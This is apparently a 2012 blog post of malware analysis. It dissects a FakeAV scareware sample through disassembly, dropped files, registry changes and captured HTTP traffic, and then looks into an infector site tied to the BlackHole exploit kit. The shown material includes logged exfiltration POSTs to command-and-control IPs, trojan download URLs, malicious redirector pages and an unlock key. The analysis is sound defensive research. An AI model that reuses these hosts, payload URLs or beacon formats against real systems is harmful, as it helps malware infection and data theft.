loc_40199F:
loc_4019B0:
 ↓
loc_4019C9:
call    ds:GetCommandLineA
mov     dword_414A68, eax
call    sub_405C67
mov     lpMem, eax
call    sub_405BAC
test    eax, eax
jns     short loc_4019EF 
 ↓
loc_4019EF:
loc_401A00:
loc_401A13:
loc_401A24:
//Other OP i.e. creating+write files, Get/Create/Terminate Process acts -->>[CLICK] Also a dialog-box OP like below w/File Operations, Implied a GUI↓ // Some file w/dialog box...see a lot of these in FakeAV Malwares...
 .text:0040DF5A  align 10h
.text:0040DF60  push    ebp
.text:0040DF61  mov     ebp, esp
.text:0040DF63  mov     eax, ds:ChooseFontW ; Create a Font common dialog box
.text:0040DF68  mov     dword_412C84, eax
.text:0040DF6D  mov     ecx, ds:GetFileTitleW ; Extract FileName from FullName
.text:0040DF73  mov     dword_412C88, ecx
.text:0040DF79  mov     edx, ds:PageSetupDlgW ; Create a Page Setup dialog box for
.text:0040DF79                          ; specifying the attributes of a printed page
.text:0040DF7F  mov     dword_412C8C, edx
.text:0040DF85  mov     eax, ds:FindTextW ; Create a system-defined modeless
.text:0040DF85                          ; dialog box for text-search
.text:0040DF8A  mov     dword_412C90, eax
.text:0040DF8F  mov     ecx, ds:PrintDlgExW
.text:0040DF95  mov     dword_412C94, ecx
.text:0040DF9B  mov     edx, ds:GetFileTitleW ; Extract FileName from FullName
.text:0040DFA1  mov     dword_412C98, edx
.text:0040DFA7  mov     eax, ds:GetOpenFileNameW ; Create an Open common dialog box
.text:0040DFAC  mov     dword_412C9C, eax
.text:0040DFB1  mov     ecx, ds:ReplaceTextW ; Create a system-defined modeless
.text:0040DFB1                          ; dialog box for text-replace
.text:0040DFB7  mov     dword_412CA0, ecx
.text:0040DFBD  mov     edx, ds:CommDlgExtendedError ; Get a common dialog box error code
.text:0040DFC3  mov     dword_412CA4, edx
.text:0040DFC9  mov     eax, ds:GetSaveFileNameW ; Create a Save common dialog box
.text:0040DFCE  mov     dword_412CA8, eax
.text:0040DFD3  mov     ecx, ds:ChooseFontW ; Create a Font common dialog box
.text:0040DFD9  mov     dword_412CAC, ecx
.text:0040DFDF  pop     ebp
.text:0040DFE0  retn

Behaviour Analysis

This is the result if you run the softwares, I'll make it brief. //File activities...
//self deletion of the original sample..
  C:\unixfreaxjp-test\sample.exe 
////drops & self-copied into...
1. C:\Documents and Settings\User\Local Settings\Application Data\hdjusttt.exe
*) This name is random in every case...
//Created processes...
//By: origin hdjusttt.exe 249d145396baa974753e41d79982ae81190ffeafd24b9acdadc2d451fdb8f81d , 
//path=C:\Documents and Settings\User\Local Settings\Application Data\hdjusttt.exe (sample)
  |
  +--  0xf0 notepad.exe C:\WINDOWS\system32\NOTEPAD.EXE
  +--  0x7e4 svchost.exe C:\WINDOWS\system32\svchost.exe (Foreign Memory Regions Written)

//With thread below...
  0xf0 notepad.exe 0xf4 0x7c810867
    |
    +--0x348 svchost.exe 0x784 0x7c810856 (Foreign Memory Regions Written)
    +--0x3e8 svchost.exe 0x94 0x7c810856 (Foreign Memory Regions Written)
    +--0x7e4 svchost.exe 0xb8 0x7c810867 (Foreign Memory Regions Written)
//Three important Registry changes detected...
//Creating fake NotePad...
HKCU\Software\Microsoft\Notepad

//Internet settings...
Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings 
Type: REG_BINARY/REG_BINARY 
From: 56/56 
To:  XX/XX //binary...

//malware exec start origin regists...
Key: HKU\..\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders
Type: Local AppData
New: C:\DocumentsandSettings\Administrator\LocalSettings\Application Data  
//Downloads and install FakeAV components:
date        hrs     size  filename                              md5
-----------------------------------------------------------------------------------------------
2012/11/24  20:53   2,960 945C33B96395E50D0000945B9F62EA33      811cfb9b55bd85562a5466918ebd2c63          
2012/11/24  20:09 443,392 945C33B96395E50D0000945B9F62EA33.exe  62ed7e0847e333064d75555446d92bff            
2012/11/24  20:09   4,286 945C33B96395E50D0000945B9F62EA33.ico  f979390b4527bed0661ff1130202a1b5           
//And runs it like this captured... Yes, the strange desktop task icons shows you fake alert... And the Notepad suddenly popped-up, I suppose is to make users feel that - the PC is currently infected (LOL) //Then it started to scan your PC with fake scans & licking everything... After the scan done it will pop this message to make you pay to continue using ur PC.. ↑I marked the support center & the non-refund terms.. It dropped the malware saved data below: File:945C33B96395E50D0000945B9F62EA33 MD5:811cfb9b55bd85562a5466918ebd2c63, Contents:
0000   41 3B 11 3E 7D 59 5F 25 69 48 32 1B 6C 64 69 18    A;.>}Y_%iH2.ldi.
0010   71 5A 7A 70 1C 15 72 70 DB 42 18 DA 74 1F FB 00    qZzp..rp.B..t...
0020   94 A0 F4 CB 2A D9 90 09 FF A9 2C F8 57 27 9E 71    ....*.....,.W'.q
0030   99 78 6D 9F 50 87 F6 7F 5A AE 72 C7 CD 45 BD 80    .xm.P...Z.r..E..
0040   31 8F F0 0F 04 6B 4B 46 3D 68 F0 E7 91 89 C5 B3    1....kKF=h......
0050   70 45 14 80 9F 3E D4 2B 19 45 D7 7C C2 4A 98 AA    pE...>.+.E.|.J..
0060   AA 39 19 F8 E8 68 4D 16 DB B2 CF CE 70 5D 69 35    .9...hM.....p]i5
0070   FA A1 C7 A3 DB 84 31 44 D4 F3 05 0C C1 CB 91 06    ......1D........
0080   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
0090   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
00A0   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
00B0   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
00C0   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
00D0   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
00E0   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
00F0   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
0100   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
0110   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
0120   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
0130   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
0140   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
0150   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
0160   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
0170   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
0180   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
0190   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
01A0   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
01B0   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
01C0   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
01D0   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
01E0   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
01F0   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
Not only the above crime, this software actually sent ur data outside, see the PoC in the Network analysis below...

Network analysis

Three communications to 217.76.130.213, 59.126.131.132, 61.222.241.208 occurred: The first trace network was the download of the FakeAV program, from Host: proyectosnavarra.es(217.76.130.213), memo'ed this as below:
0000  00 a0 c9 22 b0 ee 00 1b  8b 69 9d 9d 08 00 45 00   ...".... .i....E.
0010  00 b7 8f 3c 40 00 80 06  47 38 c0 a8 07 02 d9 4c   ...<@... G8.....L
0020  82 d5 06 6b 00 50 b4 7c  5e fe 0e 68 c8 3f 50 18   ...k.P.| ^..h.?P.
0030  7d 78 a9 18 00 00 47 45  54 20 2f 39 34 35 43 33   }x....GE T /945C3
0040  33 42 39 36 33 39 35 45  35 30 44 30 30 30 30 39   3B96395E 50D00009
0050  34 35 42 39 46 36 32 45  41 33 33 2e 65 78 65 20   45B9F62E A33.exe
↑It said GET /945C33B96395E50D0000945B9F62EA33.exe HTTP/1.0 After getting installed I recorded all of comm PCAP data, highlighted below: //Sending data to (59.126.131.132:8080) using HTTP/POST
POST /index.php HTTP/1.1
Host: 59.126.131.132:8080:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 848

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sid"

6505105311892209
--1BEF0A57BE110FD467A

Content-Disposition: form-data; name="up"
431718

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wbfl"

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="v"

201
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ping"

1182
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="guid"

{BC471CE6-8BA5-4705-B840-5CEA99636DEC}
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wv"

5#2#3#0#2600#0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ms"

0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sr"

0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ar"
0
--1BEF0A57BE110FD467A--
And got replied below: (NOTE: It saved data in your PC)
HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 24 Nov 2012 11:46:15 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.4.4-7
Vary: Accept-Encoding
Content-Length: 823

HTTP/1.1 200 OK
Date: Sat, 24 Nov 2012 11:46:22 GMT
Server: Apache/2.2.16
Content-Length: 637
Connection: close
Content-Type: multipart/form-data; boundary="1BEF0A57BE110FD467A"

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="COMMON"; filename="COMMON.BIN"
Content-Type: application/octet-stream

'hr.%-.+.*+.(**#"))+"'4hr.%.'ywtxp%.'m%.***.'4m%.'h%*/+5*(.5--5)*,!#+#+.
*,#5,,5*+(5./!#+#+.*##5)*)5*.-5*#+!#+#+.*##5/+5*/*5/!/(/.-.)+)5*-"5))/5)
+)!#+#+.)**5*,)5**)5,!#+#+./-5*+.5*)*5#-!/(/.-..+5))5*(-5*.+!#+#+.."5*)-
5*(*5*()!#+#+.."5).5*#"5)(/!#+#+.-*5)))5)/*5)+#!#+#+.--5)()5*/.5*,/!---,.
#*5"(5)/#5*.)!#+#+.#)5**(5)+/5))#!#+#+."*5*)*5"+5#+!#+#+."*5)+.5-(5*"/!/(/
.-.wt}o|nu+*5in.kthoytc"+*5in.hytwo,*5in.hwtktpzu)*5in.o~izurzu***5in'4h%.
'h~w}rk%."5*)-5*(*5*()'4h~w}rk%.'4ywtxp%--1BEF0A57BE110FD467A--
//Then it sends data to (61.222.241.208:8080) via HTTP/POST like as before...
POST /index.php HTTP/1.1
Host: 61.222.241.208:8080:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 848

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sid"

3549713911081243
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="up"

689468
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wbfl"

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="v"

201
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ping"

1182
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="guid"

{BC471CE6-8BA5-4705-B840-5CEA99636DEC}
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wv"

5#2#3#0#2600#0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ms"

0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sr"

0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ar"

0
--1BEF0A57BE110FD467A--
And got replied too↓(NOTE: It saved data in your PC)
HTTP/1.1 200 OK
Server: nginx/1.2.5
Date: Sat, 24 Nov 2012 11:53:53 GMT
Content-Type: text/html
Content-Length: 823
Connection: keep-alive
X-Powered-By: PHP/5.4.4-7
Vary: Accept-Encoding

HTTP/1.1 200 OK
Date: Sat, 24 Nov 2012 11:50:37 GMT
Server: Apache/2.2.16
Content-Length: 637
Connection: close
Content-Type: multipart/form-data; boundary="1BEF0A57BE110FD467A"

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="COMMON"; filename="COMMON.BIN"
Content-Type: application/octet-stream

'hr.%(./",*("**+#*)/('4hr.%.'ywtxp%.'m%.***.'4m%.'h%*/+5*(.5--5)*,!#+#+.*,#5,,
5*+(5./!#+#+.*##5)*)5*.-5*#+!#+#+.*##5/+5*/*5/!/(/.-.)+)5*-"5))/5)+)!#+#+.)**5
*,)5**)5,!#+#+./-5*+.5*)*5#-!/(/.-..+5))5*(-5*.+!#+#+.."5*)-5*(*5*()!#+#+.."5).
5*#"5)(/!#+#+.-*5)))5)/*5)+#!#+#+.--5)()5*/.5*,/!---,.#*5"(5)/#5*.)!#+#+.#)5**
(5)+/5))#!#+#+."*5*)*5"+5#+!#+#+."*5)+.5-(5*"/!/(/.-.wt}o|nu+*5in.kthoytc"+*5in.
hytwo,*5in.hwtktpzu)*5in.o~izurzu***5in'4h%.'h~w}rk%-*5)))5)/*5)+#'4h~w}rk%.'4y
wtxp%--1BEF0A57BE110FD467A--
//Then it seeked DNS of sys.cougarsupport.net TestPC --> 8.8.8.8 DNS Standard query A sys.cougarsupport.net 8.8.8.8 --> TestPC DNS Standard query response A 178.32.29.188
0000  00 a0 c9 22 b0 ee 00 12  f0 e9 3e 3e 08 00 45 00   ...".... ..>>..E.
0010  00 43 01 39 00 00 80 11  61 65 c0 a8 07 54 08 08   .C.9.... ae...T..
0020  08 08 04 b4 00 35 00 2f  b5 9d d5 31 01 00 00 01   .....5./ ...1....
0030  00 00 00 00 00 00 03 73  79 73 0d 63 6f 75 67 61   .......s ys.couga
0040  72 73 75 70 70 6f 72 74  03 6e 65 74 00 00 01 00   rsupport .net....
0050  01                 
Which ending up the request of the support center web site...
GET /?nid=9455E50D HTTP/1.1
Accept: */*
Accept-Language: ja
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: sys.cougarsupport.net
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sat, 24 Nov 2012 11:54:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.14
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

4e44

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "h00p://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="h00p://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
    <head>
        <title> System Progressive Protection </title>
        <meta h00p-equiv="Content-type" content="text/html;charset=UTF-8" />
        <link rel="stylesheet" type="text/css" href="styles/main.css" />
    </head>

    <body>
        <div class="wrap">
            <div class="left-part">
                <div class="logo-img">
                    <img src="/img/system-progressive-protection.png" alt="logo" />
                </div>  :
  :
Here's the snapshot of support page of this sh*t↓

IP Infector's History Analysis

As we see, the A record leads us to IP 217.76.130.213, 217.76.130.3 I think I saw the 217.76.130.213 before... seeking the notes & found below previous infections in that IP:
//infector records, source: SPAM
h00p://cimatfoto.com/
h00p://grupoestudio.com/default.html
//trojan dropped records, source also SPAM
h00p://bc2bc.eu/imagenes/explorer-7.0.exe
h00p://grupoestudio.com/get_flash_update.exe
Let's see the current status of this IP infector, suspected an EK is active there, used the recent url... //fetch...
--17:03:36--  h00p://cimatfoto.com/
           => `index.html'
Resolving cimatfoto.com... 217.76.130.213
Connecting to cimatfoto.com|217.76.130.213|:80... connected.
HTTP request sent, awaiting response... 200 OK
HTTP/1.1 200 OK
Content-Length: 481
Content-Type: text/html
Content-Location: h00p://cimatfoto.com/index.htm
Last-Modified: Wed, 29 Feb 2012 11:59:52 GMT
Accept-Ranges: bytes
ETag: "caa60a5d9f6cc1:958"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 24 Nov 2012 08:06:03 GMT
Connection: keep-alive
Length: 481 [text/html]
17:03:37 (12.07 MB/s) - `index.html' saved [481/481]
It is an an IFRAME redirector...to m1 & m2.htm
$ cat index.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Cimat Foto s.a.</title>
</head>
<frameset rows="1,*" cols="*" framespacing="0" frameborder="NO" border="0">
  <frame src="m1.htm" name="m1" scrolling="NO" noresize id="m1">
  <frame src="m2.htm" name="m2" id="m2">
</frameset>
<noframes><body>
</body></noframes>
</html>
And we found what looks like infector in m2.htm↓
--17:07:54--  h00p://cimatfoto.com/m2.htm
           => `m2.htm'
Resolving cimatfoto.com... 217.76.130.213
Connecting to cimatfoto.com|217.76.130.213|:80... connected.
h00p request sent, awaiting response... 200 OK
Length: 736 [text/html]
17:07:55 (20.76 MB/s) - `m2.htm' saved [736/736]

$ cat m2.htm

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"h00p://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta h00p-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Documento sin título</title>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_goToURL() { //v3.0
  var i, args=MM_goToURL.arguments; document.MM_returnValue = false;
  for (i=0; i<(args.length-1); i+=2) eval(args[i]+".location='"+args[i+1]+"'");
}
//-->
</script>
</head>
<body onLoad="MM_goToURL('parent.frames[\'m2\']','WEB/Inicio.html');return document.MM_returnValue">
<img src="h00p://cgi.cimatfoto.com/Count.exe?df=cimatfoto.com.c1&dd=57chevy&sh=F&ft=0&pad=F">
</body>
</html>
Leads us to download Inicio.html & lead us to spanish photography online store/site, a spam site it is (darn!) But the other history of the downloaded trojans shows us this is not a good site/IP. We know it is an unhealthy redirector scheme and God knows what other evil landing page w/redir schemes exists in this IP..

Samples / References

Samples of this analysis↓ You can download them here-->>[CLICK] Virus Total Detection Ratio↓ CMUNFWKUWY.html 4fc7aba0c29053469b9f5c6ff2b04c1b (0/44) malware.eml 434b9db6d22b0a09f3adab8ae8ebdf34 (0/44) Postal_Receipt.exe 3811ed1d5493d02ee7720f36e31a54c4 (20/44) Receipt.zip f59f065647151aa701c553bea0da44c1 (22/44) 945C33B96395E50D0000945B9F62EA33.exe 62ed7e0847e333064d75555446d92bff (2/44) ↑If you see these well, infectors are about 50% detected, but the FakeAV program - is only detected by 2(two) AntiVirus products..(ESET & K7) POINT is the usage of the crypter made malware detection ratio smaller.. If you got locked by this mess, below is the unlocked key:
AA39754E-715219CE
There are many way to REMOVE this malware -->>[CLICK] Be careful friends by opening UPS emails. Stay Safe!

#MalwareMustDie

Sunday, November 18, 2012

PluginDetect 0.7.9 infector "et" Cridex Payloads of BlackHole Exploit Kit v2 (203.80.16.81) used CVE-2012-4681, CVE-2012-5076, CVE-2009-0927++

I came into PluginDetect 0.7.9 usage in the BHEK2 recently.
The software PluginDetect 0.7.9 was released today in with the following details:
PluginDetect Library
version: 0.7.9
released: 10/17/2012
by Eric Gerds

You can see it yourself in its website here --->>[CLICK]
Or see the below capture pic of the site (click to enlarge)


If you click the "Download PluginDetect" menu on the left side, you'll see
a javascript generator of PluginDetect, as per picture below:


After you choose your options on which components to detect of a browser,
this generator applet will burp a javascript code result like below:

↑If you see closely to the marked part of the code then you will recognize it -
as our old friend PluginDetect used to be used by BlackHole Exploit Kit v2/BHEK2.

PluginDetect is actually a useful good code to create a detection of a browser, 
however BHEK2 and other EK is misused it for the bad purpose.

We know that BHEK2 were previously using PluginDetect 0.7.8, but today I bumped 
to infector with using PluginDetect 0.7.9 with CVE-2012-5076 & below is the story:

Hinted by our @Hulk_Crusader, we investigated an infector site at: fi.mattlemons.org
It contains a lot of infector links as per snipped below:
   [1]Name          [2]Last modified    [3]Size  
------------------------------------------------
  [5]Jssl.php           16-Nov-2012 05:52   73K
  [6]aVhg.html          11-Nov-2012 06:21  391
  [7]bVhg.html          11-Nov-2012 06:21  611
  [8]bablo5.php         16-Nov-2012 16:05   67
  [9]bind.php           11-Nov-2012 07:24   12K
  [10]faqPkOE.php       11-Nov-2012 07:32  8.2K
  [11]favicon.gif       05-Sep-2011 14:17    0
  [12]favicon.ico       05-Sep-2011 14:17    0
  [13]index.main.php    16-Nov-2012 05:47  4.0K
  [14]info.php          16-Nov-2012 05:49   34K
  [15]jorik5.php        16-Nov-2012 16:05   74
  [16]joy.php           16-Nov-2012 05:49  5.5K
  [17]mainEFjd.php      16-Nov-2012 05:49  8.2K
  [18]mainVjH.php       16-Nov-2012 05:49  8.2K
  [19]page8.htm         16-Nov-2012 15:11  1.0K
  [20]rVhg.html         11-Nov-2012 06:21  744
  [21]sVhg.html         11-Nov-2012 06:21  664
  [22]seo4.php          16-Nov-2012 16:05   70
  [23]sitemapl82.php    16-Nov-2012 05:50  8.2K
  [24]stylecss.php      16-Nov-2012 05:51   24K
  [25]system_file.php   16-Nov-2012 15:11   71
  [26]topsale5.php      16-Nov-2012 16:05   67
  [27]w11292880n.php    16-Nov-2012 05:51   24K
  [28]w11384180n.php    16-Nov-2012 05:52   24K
  [29]w11884808n.php    16-Nov-2012 05:53   24K
  [30]w11991996n.php    16-Nov-2012 05:53   24K
  [31]w12272200n.php    16-Nov-2012 05:54   24K
  [32]w12745201n.php    09-Nov-2012 06:54  303K <=== suspicious
  [33]w14074084n.php    16-Nov-2012 05:54   92K
  [34]w14137042n.php    16-Nov-2012 05:54   92K
  [35]w14455434n.php    16-Nov-2012 05:55   24K
  [36]w15104461n.php    16-Nov-2012 05:56   70K
  [37]w16762030n.php    16-Nov-2012 05:56   24K
  [38]w17886614n.php    16-Nov-2012 05:56   70K
  [39]w18956554n.php    16-Nov-2012 05:57   24K
  [40]w19446592n.php    16-Nov-2012 05:58   24K
  [41]w19572944n.php    16-Nov-2012 05:58   24K
  [42]w20687587n.php    16-Nov-2012 05:58   24K
  [43]w21108783n.php    16-Nov-2012 05:58   24K
  [44]w22312966n.php    16-Nov-2012 06:00   24K
  [45]w24463996n.php    16-Nov-2012 06:00   24K
  [46]w24813801n.php    16-Nov-2012 06:02   24K
  [47]w24912540n.php    16-Nov-2012 06:03   24K
  [48]w25181459n.php    16-Nov-2012 06:05   24K
  [49]w25516725n.php    16-Nov-2012 06:05   92K
  [50]w26388892n.php    09-Nov-2012 06:37  297K <=== suspicious
  [51]w26953552n.php    16-Nov-2012 06:07   92K
  [52]w27341032n.php    16-Nov-2012 06:08   24K
  [53]w27711058n.php    16-Nov-2012 06:10   24K
  [54]w27944845n.php    16-Nov-2012 06:11   24K
  [55]w29438343n.php    16-Nov-2012 12:36   23K
  [56]w32104720n.php    16-Nov-2012 12:36   23K
  [57]w32403343n.php    16-Nov-2012 12:36   23K
  [58]w32844482n.php    16-Nov-2012 12:36   23K
  [59]w33118612n.php    16-Nov-2012 12:36   23K
  [60]w33764801n.php    16-Nov-2012 12:36   23K
  [61]w36011284n.php    16-Nov-2012 12:36   23K
  [62]w36584950n.php    09-Nov-2012 07:36  138K <=== suspicious
  [63]w37531540n.php    16-Nov-2012 12:36   23K
  [64]w37715594n.php    16-Nov-2012 12:36   23K
  [65]w37727072n.php    16-Nov-2012 12:36   23K
  [66]w38297236n.php    16-Nov-2012 12:36   23K
  [67]w38994382n.php    16-Nov-2012 12:36   23K
  [68]w39565125n.php    16-Nov-2012 12:36   23K
  [69]w39715194n.php    16-Nov-2012 12:36   23K
  [70]w41352222n.php    16-Nov-2012 12:36   23K
  [71]w42271663n.php    16-Nov-2012 12:36   92K
  [72]w42595965n.php    16-Nov-2012 12:36   23K
  [73]w43085485n.php    16-Nov-2012 12:36   23K
  [74]w43584820n.php    16-Nov-2012 12:36   23K
  [75]w45042947n.php    16-Nov-2012 12:36   23K
  [76]w48788700n.php    16-Nov-2012 12:36   23K
  [77]w49496620n.php    16-Nov-2012 12:36   23K
  [78]w49977014n.php    16-Nov-2012 12:36   23K
  [79]w51693290n.php    16-Nov-2012 12:36   23K
  [80]w52354703n.php    16-Nov-2012 12:36   23K
  [81]w54253689n.php    16-Nov-2012 12:36   23K
  [82]w54406687n.php    16-Nov-2012 12:36   23K
  [83]w54854224n.php    16-Nov-2012 12:36   23K
  [84]w54924852n.php    16-Nov-2012 12:36   23K
  [85]w55756681n.php    16-Nov-2012 12:36   23K
  [86]w56926790n.php    16-Nov-2012 12:36   69K
  [87]w57142260n.php    16-Nov-2012 12:36   23K
  [88]w57288477n.php    16-Nov-2012 12:36  160K <=== suspicious
  [89]w57363423n.php    16-Nov-2012 12:36   23K
  [90]w57574466n.php    16-Nov-2012 12:36   23K
  [91]w58386696n.php    16-Nov-2012 12:36   23K
  [92]w58414355n.php    16-Nov-2012 12:36   69K
  [93]w58824744n.php    16-Nov-2012 12:36   23K
  [94]w59182790n.php    16-Nov-2012 12:36   23K
  [95]w59615462n.php    16-Nov-2012 12:36   69K
  [96]w59702531n.php    16-Nov-2012 12:36   23K
  [97]w60326763n.php    09-Nov-2012 04:22  275K <=== suspicious
  [98]w61856170n.php    16-Nov-2012 12:36   23K
  [99]w62088643n.php    09-Nov-2012 07:38  161K <=== suspicious
  [100]w64137644n.php   16-Nov-2012 12:36  115K <=== suspicious
  [101]w64214598n.php   16-Nov-2012 12:36   69K
  [102]w64908493n.php   16-Nov-2012 12:36   23K
  [103]w64956301n.php   16-Nov-2012 12:36   23K
  [104]w65944817n.php   16-Nov-2012 12:36   92K
  [105]w65994077n.php   16-Nov-2012 12:36   23K
  [106]w66442417n.php   16-Nov-2012 12:36   23K
  [107]w67063022n.php   16-Nov-2012 12:36   23K
  [108]w67424797n.php   16-Nov-2012 12:36   69K
  [109]w68083912n.php   16-Nov-2012 12:36   92K
  [110]w68562749n.php   16-Nov-2012 12:36   23K
  [111]w69423332n.php   16-Nov-2012 12:36   23K
  [112]w69863913n.php   16-Nov-2012 12:36  115K <=== suspicious
  [113]w71004261n.php   16-Nov-2012 12:36   23K
  [114]w71254201n.php   16-Nov-2012 12:36   23K
  [115]w71703411n.php   16-Nov-2012 12:36   23K
  [116]w72627688n.php   16-Nov-2012 12:36   23K
  [117]w74483378n.php   16-Nov-2012 12:36   23K
  [118]w75274537n.php   16-Nov-2012 12:36  115K <=== suspicious
  [119]w78731488n.php   16-Nov-2012 12:36   92K
  [120]w80343543n.php   16-Nov-2012 12:36  160K <=== suspicious
  [121]w80903025n.php   09-Nov-2012 05:28  297K <=== suspicious
  [122]w81115093n.php   16-Nov-2012 12:36   23K
  [123]w81417750n.php   16-Nov-2012 12:36   23K
  [124]w82277330n.php   16-Nov-2012 12:36   69K
  [125]w82347261n.php   16-Nov-2012 12:36   23K
  [126]w84467943n.php   16-Nov-2012 12:36   23K
  [127]w85902715n.php   16-Nov-2012 12:36   69K
  [128]w86577171n.php   16-Nov-2012 12:36   23K
  [129]w86771427n.php   16-Nov-2012 12:36   23K
  [130]w86911411n.php   16-Nov-2012 12:36   23K
  [131]w86982141n.php   16-Nov-2012 12:36   92K
  [132]w87326315n.php   16-Nov-2012 12:36   23K
  [133]w88145056n.php   16-Nov-2012 12:36   92K
  [134]w88205733n.php   16-Nov-2012 12:36  137K <=== suspicious
  [135]w88685477n.php   16-Nov-2012 12:36   23K
  [136]w89338108n.php   16-Nov-2012 12:36   23K
  [137]w89476290n.php   16-Nov-2012 12:36  137K <=== suspicious
  [138]w89705559n.php   16-Nov-2012 12:36   23K
  [139]wp-conf.php      15-Nov-2012 22:26  185K <=== suspicious
*)I marked the suspicious filea above↑ I bet they are trojan malwares! (Hint: See the size of the files) Sadly the web server is well tuned & using ACL to block access, so we successfully fetched some files only, as per below:
aVhg.html     2a3e59f3088c06329e01acc3f4392e6f
bablo5.php    0423f6942706d9b36fc5551b472f12d9
jorik5.php    6e1a175421632987e00a589a93653e56
seo4.php      89cfb895e3381c2f174ef24e8c664839
topsale5.php  5e9eb5ddf71e1b4c56375c85aae92c69
page8.htm     57f31d9fc68cc28f1051028d761d8afc
